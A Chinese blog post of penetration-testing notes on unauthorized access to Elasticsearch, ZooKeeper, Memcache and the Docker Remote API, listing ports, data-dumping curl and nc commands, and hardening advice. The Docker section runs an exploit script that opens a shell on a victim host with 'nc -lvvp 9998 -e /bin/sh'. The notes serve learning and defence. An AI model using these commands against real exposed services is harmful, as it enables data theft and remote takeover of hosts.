漏洞学习记录

最新推荐文章于 2024-03-27 10:11:55 发布
最新推荐文章于 2024-03-27 10:11:55 发布
阅读量10w+ 收藏 4
点赞数 4
分类专栏: 应用漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41874930/article/details/109097608
版权

CATALOG

1.Elasticsearch未授权漏洞

  1. 端口号
    9200/9300
  2. 漏洞介绍
    Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。
  3. 利用思路
    可用来读取对应index里面的信息,可将其理解成一个数据库每一个index就是一张表每一个type就是一个字段,一个index里面有很多字段。
  4. 操作相关
    要利用这个漏洞,最重要的就是查看数据,下面是elasticsearch基本的查询方法

查询所有的 index, type:
curl localhost:9200/_search?pretty=true
查询某个index下所有的type:
curl localhost:9200/films/_search
查询某个index 下, 某个 type下所有的记录:
curl localhost:9200/films/md/_search?pretty=true
带有参数的查询:
curl localhost:9200/films/md/_search?q=tag:good
使用JSON参数的查询: (注意 query 和 term 关键字)
curl localhost:9200/film/_search -d ’
{“query” : { “term”: { “tag”:“bad”}}}’
http://192.168.80.126:9200/_plugin/head/ #web管理界面
http://192.168.80.126:9200/_cat/indices #查看集群当前状态
http://192.168.80.126:9200/_nodes #查看节点数据
http://192.168.80.126:9200/_river/_search #查看数据库敏感信息

  1. 实际操作
  • 直接访问ip:9200
    在这里插入图片描述
  • ip:9200/_cat/indices/?v #查询所有的index
    在这里插入图片描述
  • ip:9200/_mapping?pretty=true #查询所有index与其对应的type
    在这里插入图片描述
  • ip:9200/index的名字/_search?pretty=ture #查询对应index的type的具体值
    在这里插入图片描述
  1. 修复建议
    1、为elasticsearch增加登录验证,可以使用官方推荐的shield插件,该插件为收费插件,可试用30天,免费的可以使用elasticsearch-http-basic,searchguard插件。插件可以通过运行Biplugin install [github-name]/repo-name。同时需要注意增加验证后,请勿使用弱口令。
    2、架设nginx反向代理服务器,并设置http basic认证来实现elasticsearch的登录认证。
    3、默认开启的9200端口和使用的端口不对外公布,或架设内网环境。
    4、elasticsearch 早期版本在“CVE中文漏洞信息库”网站上已有部分漏洞被披露,建议使用1.7.1以上版本或使用最新版本程序。
    5、限制IP访问,绑定固定IP
  2. 参考
    Elasticsearch未授权访问漏洞

2.ZooKeeper 未授权访问漏洞

  1. 端口号
    2181

  2. 漏洞介绍
    ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。ZooKeeper的目标就是封装好复杂易出错的关键服务,将简单易用的接口和性能高效、功能稳定的系统提供给用户。

  3. 利用思路
    ZooKeeper默认开启在2181端口,在未进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境

  4. 利用相关
    zookeeper下载地址:http://archive.apache.org/dist/zookeeper/
    zookeeper可视化管理工具下载连接:https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

  5. 实际操作

  • echo envi|nc ip 2181#返回大量敏感信息,host名等,下图为节选
    在这里插入图片描述
  • 也可以使用图形化界面查询Zookeeper中的内容
    在这里插入图片描述
  1. 修复建议
    禁止把Zookeeper直接暴露在公网
    添加访问控制,根据情况选择对应方式(认证用户,用户名密码,指定IP)
    配置防火墙策略,只允许指定IP访问2181端口
    配置服务ACL限制IP访问
  2. 参考
    Zookeeper 未授权访问漏洞

3.Memcache未授权访问

memcache是一套分布式的高速缓存系统,它以Key-Value(键值对)形式将数据存储在内存中,默认开放11211端口,使用nmap的脚本进行扫描。

  1. 端口号
    11211

  2. 漏洞介绍
    memcache是一套分布式的高速缓存系统,它以Key-Value(键值对)形式将数据存储在内存中,默认开放11211端口,使用nmap的脚本进行扫描。

  3. 利用思路
    直接使用nc进行连接获取敏感信息

  4. 利用相关
    stats 查看memcache 服务状态
    stats items 查看所有items

  5. 实际操作
    在这里插入图片描述
    在这里插入图片描述

  6. 修复建议
    一、 因memcache无权限控制功能,所以需要用户对访问来源进行限制。一般不需要外网访问的,可以直接绑定本地127.0.0.1 即可,实现方式如下:
    [root@local ~]# vim /etc/sysconfig/memcached
    OPTIONS="-l 127.0.0.1" #设置本地为监听
    [root@local ~]# /etc/init.d/memcached restart #重启服务
    二、 当memcached 配置为监听内网IP或公网IP时, 使用主机防火墙(iptalbes、firewalld等)和网络防火墙对memcached服务端口进行过滤。

  7. 参考
    未授权漏洞测试
    Memcache未授权访问漏洞利用及修复

4.docker未授权漏洞利用

扫描出docker未授权漏洞后使用脚本dockerRemoteApiGetRootShell.py进行攻击。攻击过程如下:

  1. 下载脚本:下载地址
  2. 安装依赖库(基于python2)
    pip install -r requirements.txt
  3. 获取受害主机shell
    python dockerRemoteApiGetRootShell.py -h ip -p 2375 # 获取docker id
    python dockerRemoteApiGetRootShell.py -h ip -p 2375 -e “nc -lvvp 9998 -e /bin/sh” -I c60d6d45e76c7d3f9d7abae075cb77b4924bd7133eebddc59679f2a60eb32bc2 #反弹shell
Shanfenglan7
关注
专栏目录
业务逻辑漏洞学习笔记(一)
qq_64775230的博客
04-21 125
业务逻辑漏洞发现方法:先将这些业务流程走一遍------从中发现哪里会出现可能的漏洞发生点-----从这些发生点中发现可以进行操作的地方----然后进行修改相应的参数。业务逻辑漏洞:代码出现一些问题-----程序不严谨或逻辑太复杂------一些逻辑分支不能正常处理---错误的发生---这就说明了我还有没考虑的点:漏洞。王者荣耀:选英雄的时候思考不周全、就很单纯,就想玩------英雄的克制关系看错了-----被克制了就死了------游戏打法出现了漏洞,黑洞。漏洞发生点:注册页面--恶意注册短信轰炸。
XSS漏洞学习笔记
qi_SJQ_的博客
12-31 2638
xss学习笔记
漏洞学习
sinat_31308671的博客
04-01 2179
SQL注入SQL MAP经典6步法补充:盲注sql注入防范:暴力破解:暴力破解漏洞概述暴力破解测试流程:暴力破解之验证码绕过:Burp suite之intruder功能简介:XSS漏洞成因:XSS分类:反射性XSS:存储型XSS:DOM型XSS:XSS漏洞——测试过程TIPS:XSS防范措施CSRF漏洞CSRF与XSS区别:如何确认一个web系统存在CSRF漏洞文件上传漏洞文件上传漏洞测试流程文...
零基础学漏洞挖掘(浅谈)
shilizaihao的博客
04-16 1012
零基础如何学习漏洞挖掘呢?在这里我就结合前三期搭建的测试网站来说一下如何入门、如何进级! 有朋友问:当下靶机比比皆是,即好用又实用,为啥还要自己去搭建测试网站呢?对初学者来说,我建议自己搭环境、下源码、做网站、自己去安装调试给自己一个比较真实的环境也给自己养成一个良好的习惯! 对于初学者,在网站搭建完成后就可以百度一些经典的有漏洞的源码下载进行安装,按照大神们的分析方法、实战步骤一步一步去学习。...
WEB安全全基础漏洞学习
qq_62708558的博客
05-23 3303
web安全全基础漏洞学习
XSS漏洞原理
bamanju0574的博客
08-31 227
注入型漏洞的本质都是服务端分不清用户输入的内容是数据还是指令代码,从而造成用户输入恶意代码传到服务端执行。 00x01js执行 Js是浏览器执行的前端语言,用户在存在xss漏洞的站点url后者能输入数据的部分插入js语言,服务器接收到此数据,认为是js代码,从而返回的时候执行。因此,攻击者可利用这个漏洞对站点插入任意js代码进行窃取用户的信息。 00x02 xss攻击 XSS是一...
web安全漏洞学习文章
AndyLizh的专栏
02-22 633
TaneRoom的博客http://blog.csdn.net/tanzhen1991910/article/category/6497228谢谢老师
Java漏洞学习笔记 Deserialization Vulnerability.zip
最新发布
06-30
java郑
deserialize-test:反序列化漏洞学习记录
05-01
学习记录将深入探讨Java中的反序列化漏洞,帮助你理解其原理、危害以及如何防范。 反序列化是对象持久化过程的一部分,它将之前通过序列化保存在磁盘或网络上的对象状态恢复为可执行的内存对象。在Java中,`java....
FastJson远程命令执行漏洞学习笔记
ch98000的博客
09-04 459
fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。fastjson.jar是阿里开发的一款专门用于Java开发的包,可以方便的实现json对象与JavaBean对象的转换,实现JavaBean对象与json字符串的转换,实现json对象与json字符串的转换。
从零开始学习软件漏洞挖掘系列教程
04-13
从零开始学习软件漏洞挖掘系列教程
逻辑漏洞学习-知识点总结
weixin_49349476的博客
06-03 1588
学习完个人感觉:逻辑漏洞是思维上的对决,开发者第一目的是实现功能,在一些开发上,就存在漏洞。在身份证验证、验证码验证、忘记密码、支付时、其他方面等都存在漏洞
新手如何学习漏洞?看这篇就够了【网络安全
xv7676的博客
05-08 5303
漏洞挖掘是指通过分析软件、系统或网络中存在的安全漏洞来发现并利用这些漏洞漏洞挖掘是信息安全领域的一项重要工作,可以帮助企业和组织提高系统的安全性,避免黑客攻击和数据泄露。漏洞挖掘的流程一般可以概括为以下几个步骤:确定目标:确定要挖掘的软件或系统。这可能是一个应用程序、操作系统、网络设备或其他系统。收集信息:收集有关目标的信息,包括架构、协议、版本和配置等。这些信息可以通过互联网搜索、手动扫描、自动化工具和其他途径获得。分析漏洞:通过手动和自动化技术进行漏洞分析,识别潜在的漏洞类型和攻击面。
零基础如何学习漏洞?看这篇就够了【网络安全
A_991128a的博客
06-28 114
有不少阅读过我文章的伙伴都知道,我从事网络安全行业已经好几年,积累了丰富的经验和技能。在这段时间里,我参与了多个实际项目的规划和实施,成功防范了各种网络攻击和漏洞利用,提高了安全防护水平。也有很多小伙伴私信问我怎么学?怎么挖漏洞?怎么渗透?较合理的途径应该从漏洞利用入手,不妨分析一些公开的CVE漏洞。很多漏洞都有比较好的资料,分析研究的多了,对漏洞的认识自然就不同了,然后再去搞挖掘就会易上手一点!俗话说:“磨刀不误砍柴工”,就是这么个理儿。那么这篇文章就教大家怎么从零到挖漏洞一条龙学习
零基础如何学习漏洞
kaka0722ww的博客
03-27 878
先学原理,再学工具的使用
渗透学习 漏洞分析
weixin_46601374的博客
04-01 643
总不能因为这世上有人跟你道不同,你就不好好走自己的路呀 小白入坑学废集7常见的漏洞分析工具NMAP端口扫描之王——NMAP主机探测端口扫描扫描端口状态TCP扫描(-sT)SYN扫描(-sS)端口扫描探测目标主机的操作系统密码破解漏洞探测防火墙躲避绕过AWVSAWVS常见功能爬虫功能NetsparkerAppscanJskySafe3WVS椰树BurpsuiteProxySpiderScannerIntruderRepeaterDecoderComparer黑客的迂回“打法”旁站旁站收集常用收集工具漏洞扫描
网络安全常见十大漏洞总结(原理、危害、防御)_网络安全常见漏洞类型
dzqxwzoe的博客
10-05 977
与个人习惯和安全意识相关,为了避免忘记密码,使用一个非常容易记住 的密码,或者是直接采用系统的默认密码等。
小白是如何挖漏洞的(技巧篇)入门教程(非常详细)从零基础入门到精通,看完这一篇就够了
Karka_的博客
09-14 1148
这时候就是要靠我们万能的 fofa 了,首先我们要知道有哪些 cms 有漏洞这里大家可以去找网上的漏洞库,里面一般都会有漏洞合集和这里我稍后会给大家推荐一两个看到没有,就是这么多cms,一杀一个准,上分必备漏洞当然很多漏洞都不能一步到位的,当然也有很多是可以给我们刷分的不过是否重复提交,这我就不太清楚了,可以给你们看看我的战果!当然,没审核,能重复几个我就不知道了,一切随缘—-这里随便找一个cms,给你们看看就这cms,信息泄露,你看,多香!,而且这个漏洞是直接把poc打上去就行了!
常用的端口及未授权访问漏洞
小城的博客
02-15 6548
​ 一、介绍 用于快速定位端口,查找开放端口脆弱点,有利于外网渗透 1.1 具体端口 端口号 使用 弱点 21 telnet 22 SSH 28退格漏洞、OpenSSL漏洞 25 SMTP协议 53 DNS服务 67&68 DHCP服务 143 IMAP协议 161 SNMP协议 DHCP劫持 1443 mssql 1521 oracle 2049 NFS服务 2181 Zookeeper ### Zookeeper未授权
BackTrack渗透测试学习笔记概述
"这是一份关于BackTrack渗透测试的学习笔记,由作者IceSn0w编写,旨在分享其在BackTrack使用过程中的经验和技巧。笔记涵盖了Metasploit渗透测试指南、信息收集、身份识别、社会工程学攻击、Metasploit运用层攻击、...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值